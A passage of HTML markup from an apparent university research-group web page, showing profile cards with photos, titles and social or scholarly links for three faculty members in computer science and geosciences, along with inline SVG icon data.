11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n            <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c47-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c48\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c51\" class=\"style-977 style-local-182-c51 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n            <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg\" class=\"wp-image-705 style-973-image style-local-182-c53-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c54\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c58-outer\">\n            <div data-colibri-id=\"182-c58\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c58 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c59\" class=\"d-block style-973 style-local-182-c59 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/Hassan-Babaie-300x300-1.jpg\" class=\"wp-image-1634 style-973-image style-local-182-c59-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c59-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-974 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Hassan Babaie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c61\" class=\"h-text h-text-component style-975 style-local-182-c61 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c62\" class=\"h-text h-text-component style-976 style-local-182-c62 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c63\" class=\"style-977 style-local-182-c63 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 